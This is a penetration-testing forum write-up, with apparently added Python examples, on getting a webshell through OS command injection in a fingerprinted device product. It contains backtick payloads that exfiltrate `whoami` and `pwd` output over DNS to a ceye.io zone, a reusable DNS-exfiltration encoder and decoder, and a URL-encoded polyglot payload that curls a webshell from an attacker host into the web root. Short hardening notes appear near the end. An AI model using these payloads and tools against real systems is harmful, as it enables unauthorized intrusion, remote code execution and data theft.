China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: Web security in practice: getting a webshell through an OS command injection vulnerability
Author: admin
Posted: 2022-3-31 01:39
[md]**1. Finding a way in**

**Right-click, View Source showed a distinctive asset that fingerprints the product: images/select_bg.png. Searching ZoomEye (钟馗之眼) for that string gave the results shown below:**
![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**Both "reporter" and [Technology, Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all) devices carry this fingerprint. I had worked on this system before and still had its source code, so comparing the target against the source tree turned up a page that is reachable without authentication.**

**The address is:**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**, as shown:**
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**Testing the ping function on that page showed that its normal behaviour could be bypassed to run commands: the host value is handed to a shell, so a backtick expression inside it is evaluated before ping ever runs. The payload was:**

**`` `whoami`.1111.ceye.io ``, as shown:**
![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The DNS record that came back, as shown:**
![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The queried name carried the output of whoami: commands on this host run as root.**
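The ping test above works because the host field reaches a shell, so `` `whoami` `` is expanded first and its output becomes the leftmost label of a name the target resolves through the attacker's zone. A username is already a valid DNS label; most command output (paths, text with spaces or newlines) is not. The added example below, written for this edit and not code from the original post, generalizes the check: it hex-encodes the output on the target with POSIX tools, folds it into labels under the 63-octet limit, and decodes the leaked value back out of DNS query log lines. The encoding pipeline, the log format and the sample log lines are assumptions of this example, not anything shown on the page.

```python
import re

# Attacker-controlled zone as on the page (a ceye.io subdomain, token 1111).
TOKEN = "1111"
DOMAIN = "ceye.io"
LABEL_MAX = 63   # RFC 1035: a single label is at most 63 octets


def oob_payload(command: str, token: str = TOKEN, domain: str = DOMAIN) -> str:
    """Value for the ping host field. The shell runs the backtick part before
    ping, so the hex of COMMAND's output becomes the leftmost labels of the
    name the target resolves. od/tr/fold/paste are POSIX/coreutils tools
    (assumption: they exist on the target); 60-char labels stay below 63."""
    pipeline = f"{command} | od -An -tx1 | tr -d ' \\n' | fold -w 60 | paste -sd. -"
    return f"`{pipeline}`.{token}.{domain}"


def expected_qname(output: bytes, token: str = TOKEN, domain: str = DOMAIN) -> str:
    """The name the pipeline in oob_payload() produces for OUTPUT (used to
    check the decoder and to build the constructed log below)."""
    h = output.hex()
    labels = [h[i:i + 60] for i in range(0, len(h), 60)]
    return ".".join(labels + [token, domain])


def decode_qname(qname: str, token: str = TOKEN, domain: str = DOMAIN):
    """Recover the leaked output from one queried name, or None if the name
    is not under our token (or is not hex, e.g. a resolver probe)."""
    suffix = f".{token}.{domain}".lower()
    if not qname.lower().endswith(suffix):
        return None
    hexpart = qname[: -len(suffix)].replace(".", "")
    if not hexpart or len(hexpart) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", hexpart):
        return None
    return bytes.fromhex(hexpart).decode("utf-8", errors="replace")


def leaked_values(log_lines, token: str = TOKEN, domain: str = DOMAIN) -> list:
    """Pull every decoded value out of a DNS query log.
    Assumed (constructed) line format: '<timestamp> <qname> <qtype> <client-ip>'."""
    found = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        value = decode_qname(parts[1], token, domain)
        if value is not None:
            found.append(value)
    return found


# Constructed sample log: the whoami probe, the pwd result from the page
# (hex-encoded, split into two labels), and an unrelated query.
SAMPLE_LOG = [
    "2022-03-31T01:36:02Z 726f6f740a.1111.ceye.io A 203.0.113.7",
    "2022-03-31T01:36:40Z "
    + expected_qname(b"/var/www/html/view/systemconfig/systemtool/\n")
    + " A 203.0.113.7",
    "2022-03-31T01:37:00Z unrelated.example.com A 198.51.100.9",
]

if __name__ == "__main__":
    print(oob_payload("pwd"))
    for value in leaked_values(SAMPLE_LOG):
        print(repr(value))
```

A full name is limited to 253 octets, so one query carries roughly 120 bytes of output; longer output has to be cut into ranges (for example with `cut -c`) over several requests. The decoder is case-insensitive on purpose, because resolvers may randomise the case of the labels they forward.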
**2. Chaining the vulnerabilities to get a webshell**

**This write-up follows the order in which the bugs were found. The next step was to run pwd through the same ping injection to learn the web path, as shown:**
![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**This gave the site path: /var/www/html/view/systemconfig/systemtool/**

**Burp Suite meanwhile turned up an OS command injection and an arbitrary file read; the screenshot below is of the arbitrary file read.**
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The OS command injection is in /var/www/html/view/Behavior/toQuery.php. The absolute path comes from step one (the pwd result obtained by escaping the ping command); with the arbitrary file read we pulled that file's source.**
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The source code (comments marking the relevant lines are added here):**
```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>
<?php
session_start ();

if ($_GET ["objClass"] == "")
    exit ();

$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET ["method"] == "getList" || $_GET ["method"] == "import" || $_GET ["method"] == "processAlarm") {
    $param ["user"] = $_SESSION ["s_userName"];
    $param ["lan"] = $_SESSION ["lan"];
    $param ["regUserpath"] = $_SESSION ["regUserpath"];

    exec ( "rm -rf /tmp/cache" );

    $cmd = "/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
    $cmd .= " " . $_GET ["objClass"];   // untrusted value appended unquoted: the injection point
    $cmd .= " " . $_GET ["method"];     // limited to the three values checked above
    $cmd .= " " . base64_encode ( json_encode ( $param ) );   // encoded, so not injectable

    file_put_contents("/tmp/query_cmd",$cmd);

    exec ( $cmd . " > /dev/null &" );   // output discarded and command backgrounded: blind execution
} else {
    require_once ($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
    $obj = new QueryInterface ();
    $instance = $obj->getInstance ();
    $instance->invokeMethod ( $_GET ["objClass"], $_GET ["method"], $param );
}

exit ();
?>
```
**A quick audit shows the problem. When method is one of getList, import or processAlarm, the script sets $cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php", appends $_GET["objClass"] and $_GET["method"] to it with nothing but a space in between (no escapeshellarg(), no allowlist on objClass), writes the line to /tmp/query_cmd and hands it to exec($cmd . " > /dev/null &"). Anything in objClass that the shell treats as an operator therefore becomes a second command: this is a direct OS command injection. Two details shape the exploit. First, method has to be exactly one of the three allowed strings to reach exec() at all, and $param is base64-encoded before it is appended, so objClass is the only injectable parameter on this path. Second, the " > /dev/null &" suffix throws the output away and backgrounds the command, so the result has to be observed out of band (a DNS callback, or a file dropped into the web root) rather than in the HTTP response. The screenshot below shows the request.**
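To make the audit concrete, here is the command construction from toQuery.php rebuilt in Python next to a hardened version of the same thing. This is an added example written for this edit, not code from the target or from the original post. DOCROOT is assumed to be /var/www/html/ (consistent with the pwd result on the page), the objClass identifier pattern is an assumed allowlist because the page never shows a legitimate value, and shlex.quote() stands in for PHP's escapeshellarg().

```python
import base64
import json
import re
import shlex

# Fixed pieces from the page's toQuery.php. DOCROOT is an assumption for
# $_SERVER["DOCUMENT_ROOT"]; the pwd result on the page places the site
# under /var/www/html/.
PHP_BIN = "/usr/local/php/bin/php"
DOCROOT = "/var/www/html/"
QUERY_SCRIPT = DOCROOT + "system/behavior/behavior_query.php"

# The three values the original if-condition routes to exec().
ALLOWED_METHODS = frozenset({"getList", "import", "processAlarm"})
# Assumption: a legitimate objClass is a PHP-style identifier. The page never
# shows a benign value, so this pattern is a guess at the right allowlist.
OBJ_CLASS_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")


def encode_param(param: dict) -> str:
    """base64_encode(json_encode($param)) as toQuery.php does it
    (json_encode() also escapes '/', which does not matter here)."""
    blob = json.dumps(param, separators=(",", ":")).encode()
    return base64.b64encode(blob).decode()


def build_cmd_vulnerable(obj_class: str, method: str, param: dict) -> str:
    """Mirrors toQuery.php: plain concatenation, then exec()."""
    if method not in ALLOWED_METHODS:
        # the original falls through to invokeMethod() instead; not modelled here
        raise ValueError("method not routed to exec()")
    cmd = PHP_BIN + " " + QUERY_SCRIPT
    cmd += " " + obj_class          # untrusted, unquoted: the injection point
    cmd += " " + method
    cmd += " " + encode_param(param)
    return cmd + " > /dev/null &"


def build_cmd_hardened(obj_class: str, method: str, param: dict,
                       allowlist: bool = True) -> str:
    """The same command built the way it should have been:
    - method checked against the fixed set (in_array($m, [...], true) in PHP),
    - objClass must match a strict identifier pattern (preg_match() in PHP),
    - every argument shell-quoted (shlex.quote here, escapeshellarg() in PHP),
      so even a value that slipped past the pattern stays a single argument.
    allowlist=False skips the pattern check only to demonstrate that last point."""
    if method not in ALLOWED_METHODS:
        raise ValueError(f"method not allowed: {method!r}")
    if allowlist and not OBJ_CLASS_RE.fullmatch(obj_class):
        raise ValueError(f"objClass rejected: {obj_class!r}")
    argv = [PHP_BIN, QUERY_SCRIPT, obj_class, method, encode_param(param)]
    return " ".join(shlex.quote(a) for a in argv) + " > /dev/null &"


def shell_argv(cmd: str) -> list:
    """Word-split CMD the way a POSIX shell does (quotes honoured), to compare
    what each builder hands to the php binary argument by argument."""
    return shlex.split(cmd)


if __name__ == "__main__":
    evil = "|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php"
    print(build_cmd_vulnerable(evil, "getList", {"a": 1}))
    try:
        build_cmd_hardened(evil, "getList", {"a": 1})
    except ValueError as e:
        print("hardened rejected:", e)
    print(build_cmd_hardened(evil, "getList", {"a": 1}, allowlist=False))
```

The better fix in PHP is to avoid a shell entirely (proc_open() with an argv array, or a direct include of the worker script) so there is no command line for user input to break out of; where exec() has to stay, escapeshellarg() on every interpolated value plus the allowlist is the minimum.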
![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**In the screenshot above, objClass= is the parameter with the OS command injection. I had tried to get a reverse shell with bash before this, but after testing for a whole night nothing connected back, so in the end I chose to download the webshell with curl. The payload:**
```
%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php
```
**URL-decoded, that is:**
```
|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php
```
**The repeated pipe characters are there to close off the payload whatever context it lands in. A leading `|curl …` is enough when the value is appended bare; the `'` in `#'` closes a single-quoted string so that the next `|curl …` runs as a new command, and the `#` that precedes each quote turns whatever follows into a comment; the backtick copies run as command substitutions, which is what fires when the value sits inside double quotes, where `|` and `#` are literal. In toQuery.php the value is appended unquoted, so the first branch is the one that actually executes, and the trailing `#'` also comments out the method, the base64 blob and the " > /dev/null &" suffix. The curl download of the webshell succeeded, as shown:**
![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
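Which branch of the polyglot fires depends on how the value is embedded in the command line. The added example below, written for this edit and not code from the original post, walks the command with the POSIX shell's quoting rules and lists the commands the shell would actually start. The unquoted context is what toQuery.php does; the single-quoted and double-quoted contexts, and the escapeshellarg()-style one (shlex.quote here), are assumed variants that show what the extra branches are for and what proper quoting does to them. The base64 blob in TAIL is a placeholder, and 1.1.1.1 stands in for the attacker host exactly as the page redacts it.

```python
import shlex

# Pieces of the command toQuery.php runs (paths from the page); TAIL is what
# exec() appends after objClass: the method, the encoded $param, the redirect.
PHP_BIN = "/usr/local/php/bin/php"
SCRIPT = "/var/www/html/system/behavior/behavior_query.php"
TAIL = " getList eyJhIjoxfQ== > /dev/null &"

# The page's URL-decoded payload.
DOWNLOAD = "curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php"
PAYLOAD = (
    "|" + DOWNLOAD + "||`p" + DOWNLOAD + "` #' "
    + "|" + DOWNLOAD + "||`" + DOWNLOAD + "` #\\\" "
    + "|" + DOWNLOAD
)

# "unquoted" is what toQuery.php really does; the other three are assumed here.
CONTEXTS = {
    "unquoted":       lambda v: f"{PHP_BIN} {SCRIPT} {v}{TAIL}",
    "single-quoted":  lambda v: f"{PHP_BIN} {SCRIPT} '{v}'{TAIL}",
    "double-quoted":  lambda v: f'{PHP_BIN} {SCRIPT} "{v}"{TAIL}',
    "escapeshellarg": lambda v: f"{PHP_BIN} {SCRIPT} {shlex.quote(v)}{TAIL}",
}


def executed_commands(line: str) -> list:
    """Walk LINE with the shell's quoting rules and return every command the
    shell would start: each top-level segment between unquoted control
    operators (| || ; & &&), stopping at an unquoted '#' that begins a word,
    plus the body of every backtick substitution met outside single quotes.
    Deliberately minimal: no nesting, no $(...), no heredocs, no variables."""
    cmds, seg, sub = [], [], None
    state = "plain"            # plain | single | double
    word_start = True
    i, n = 0, len(line)

    def flush():
        text = "".join(seg).strip()
        if text:
            cmds.append(text)
        seg.clear()

    while i < n:
        c = line[i]
        if sub is not None:                        # collecting a `...` body
            if c == "`":
                cmds.append("".join(sub).strip())
                sub = None
            else:
                sub.append(c)
        elif state == "single":                    # everything literal until '
            if c == "'":
                state = "plain"
            else:
                seg.append(c)
        elif c == "\\" and i + 1 < n:              # \x keeps x literal (plain and double)
            seg.append(line[i + 1])
            word_start = False
            i += 1
        elif c == "`":                             # substitution runs in plain and double
            sub = []
            word_start = False
        elif state == "double":                    # ' | # are literal here
            if c == '"':
                state = "plain"
            else:
                seg.append(c)
        elif c == "'":
            state = "single"
            word_start = False
        elif c == '"':
            state = "double"
            word_start = False
        elif c == "#" and word_start:              # comment: rest of the line is gone
            break
        elif c in "|;&":                           # control operator ends the command
            flush()
            if c != ";" and i + 1 < n and line[i + 1] == c:   # || and &&
                i += 1
            word_start = True
        else:
            seg.append(c)
            word_start = c in " \t"
        i += 1
    flush()
    return cmds


def download_runs(context: str, value: str = PAYLOAD) -> bool:
    """True when the shell starts the webshell download (possibly with the
    leftover method/blob words appended as extra curl arguments)."""
    cmds = executed_commands(CONTEXTS[context](value))
    return any(c == DOWNLOAD or c.startswith(DOWNLOAD + " ") for c in cmds)


if __name__ == "__main__":
    for name in CONTEXTS:
        print(f"{name:15} download runs: {download_runs(name)}")
        for c in executed_commands(CONTEXTS[name](PAYLOAD)):
            print("    ", c[:72])
```

Against the unquoted command the first `|curl` runs and `#'` discards the rest of the line; in single quotes the `'` closes the string and the second `|curl` runs; in double quotes nothing escapes the string, and the download happens only because the backticked copy is a command substitution. Once the value goes through escapeshellarg()-style quoting the whole line is a single command and curl never starts, which is the same check a reviewer would apply to the hardened code.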
**3. Summary**
**The webshell in this case came largely from combining several vulnerabilities. First, viewing the page source identified the product, which I had tested a similar version of before. With that, the unauthenticated ping page was located, and escaping the ping command to run pwd gave the site's absolute path. Next, the arbitrary file read was used to pull the PHP file suspected of command execution; a quick audit confirmed the bug, the OS command execution payload was built, and the webshell followed. The whole process was a chain of vulnerabilities, and penetration testing often comes down to luck: had any one link been absent or missed, getting the webshell could have failed.**
**In short, luck and bug-hunting skill matter in equal measure. Thanks for reading!**
[/md]
Source: 中国网络渗透测试联盟 (China Network Penetration Testing Alliance), https://cobjon.com/